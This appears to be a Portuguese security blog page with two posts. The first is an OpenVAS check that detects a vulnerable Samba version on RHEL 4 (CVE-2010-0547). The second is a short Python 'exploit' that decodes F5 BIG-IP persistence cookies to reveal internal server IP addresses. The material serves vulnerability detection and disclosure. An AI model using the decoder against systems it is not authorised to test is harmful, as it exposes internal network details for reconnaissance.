OpenVAS: RHEL 4 Update for Samba CVE-2010-0547 – DRAFT

###############################################################################
# OpenVAS Vulnerability Test
#
# RHEL 4 Update for Samba CVE-2010-0547 – DRAFT
# firebits_CVE_2010_0547_samba_RHEL4_all.nasl
#
#
# Authors:
# System Generated Check
# Mauro Risonho de Paula Assumpção aka firebits
# mauro.risonho@gmail.com
# firebitsbr@wald.intevation.org
#
# Copyright:
# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net
# Copyright (c) 2013 NONAMESEC Security Systems, http://www.nonamesec.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

desc = ”

Vulnerability Insight:

CVE-2010-0547 samba: mount.cifs improper device name and mountpoint
strings sanitization
The MITRE CVE dictionary describes this issue as:

client/mount.cifs.c in mount.cifs in smbfs in Samba 3.4.5 and earlier
does not verify that the (1) device name and (2) mountpoint strings are
composed of valid characters, which allows local users to cause a
denial of service (mtab corruption) via a crafted string.

Affected Software/OS:
cifs on Red Hat Enterprise Linux version 4 (samba)

Fix: Please Install the Updated Packages.

References:
https://access.redhat.com/security/cve/CVE-2010-0547
http://rpmfind.net/linux/rpm2html/search.php?query=samba”;

if(description)
{
script_id(880323);
script_version(“$Revision: 12798 $”);
script_tag(name:”check_type”, value:”authenticated package test”);
script_tag(name:”last_modification”, value:”$Date: 2013-07-11 18:03:54 GMT-03:00 0 Brazil, São Paulo (Thu, 11 Jul 2013) $”);
script_tag(name:”creation_date”, value:”2009-02-27 08:31:09 +0100 (Fri, 27 Feb 2009)”);
script_tag(name:”cvss_base”, value:”2.6″);
script_tag(name:”cvss_base_vector”, value:”AV:N/AC:L/Au:N/C:N/I:N/A:P”);
script_tag(name:”risk_factor”, value:”Low”);
script_xref(name: “CVE”, value: “2010-0547”);
script_cve_id(“CVE-2010-0547”);
script_name( “Red Hat Enterprise Linux version 4 Update for samba CVE-2010-0547 RHEL4”);

script_description(desc);
script_summary(“Check for the Version of Samba”);
script_category(ACT_GATHER_INFO);
script_copyright(“Copyright (C) 2009 Greenbone Networks GmbH / Copyright (C) 2013 NoNameSEC Security Systems, Ltd”);
script_family(“RHEL Local Security Checks”);
script_dependencies(“gather-package-list.nasl”);
script_mandatory_keys(“HostDetails/OS/cpe:/o:redhat:redhat”, “login/SSH/success”, “ssh/login/release”);
exit(0);
}
include(“pkg-lib-rpm.inc”);
include(“revisions-lib.inc”);

release = get_kb_item(“ssh/login/release”);
res = “”;
if(release == NULL){
exit(0);
}

if(release == “Nahant”)
{

if ((res = isrpmvuln(pkg:”samba”, rpm:”samba-3.0.33-3.36.el4″, rls:”Nahant”)) != NULL)

{
security_warning(data:res + ‘\n’ + desc);
exit(0);
}

if (__pkg_match) exit(99); # Not vulnerable.
exit(0);
}

Anúncios

Exploit Python – F5 BIG-IP Cookie Persistence

Fiz um exploit que comprova a existência da vulnerabilidade no F5 BIG-IP Cookie Persistence como pode ser visto a vulnerabilidade está tanto na porta 80 (http), como na 443 (https):

Captura de tela - 06-05-2013 - 10:49:20

Captura de tela - 06-05-2013 - 10:49:48

Ref: http://www.securityspace.com/smysecure/catid.html?id=20089

Test ID: 20089
Category: Web Servers
Title: F5 BIP-IP Cookie Persistence
Summary: F5 BIP-IP(R) Cookie Persistence
Description: Synopsis :The remote load balancer suffers from an information disclosure
vulnerability.

Description :

The remote host appears to be a F5 BigIP load balancer which encodes
within a cookie the IP address of the actual web server it is acting
on behalf of. Additionally, information after ‘BIGipServer’ is
configured by the user and may be the logical name of the device.
These values may disclose sensitive information, such as internal IP
addresses and names.

Solution:

http://asia.f5.com/solutions/archives/techbriefs/cookie.html

Copyright This script is Copyright (C) 2005 Shavlik Technologies, LLC

Observação: O link http://asia.f5.com/solutions/archives/techbriefs/cookie.html da possível correção, não existe mais.
ToDO: Procurar outra forma de correção

Exploit:

#!/usr/bin/env python
# Mauro Risonho de Paula Assumpcao
# Pentester
# mrpa.security@gmail.com
# twitter @firebitsbr
#
#
# exploit_BIGIP_firebits_rev01
# example string BIGIP : 100733612.18724.0000

import struct
import sys

if len(sys.argv) != 2:
print “Usage: %s encoded_string” % sys.argv[0]
exit(1)

encoded_string = sys.argv[1]
print “\n[*] String to decode: %s\n” % encoded_string

(host, port, end) = encoded_string.split(‘.’)

(a, b, c, d) = [ord(i) for i in struct.pack(“<I”, int(host))]

print “[*] Decoded IP: %s.%s.%s.%s.\n” % (a,b,c,d)

OBS:

Não programo dedicado desde 2005, mas as poucos estou voltando a desenvolver pequenos scripts, na humildade mas vamos que vamos!:) No próximo post, vou tentar explicar, qual nível de problema seria, caso um atacante usasse esse cookie do F5 BIG-IP e possíveis estragos.

@firebitsbr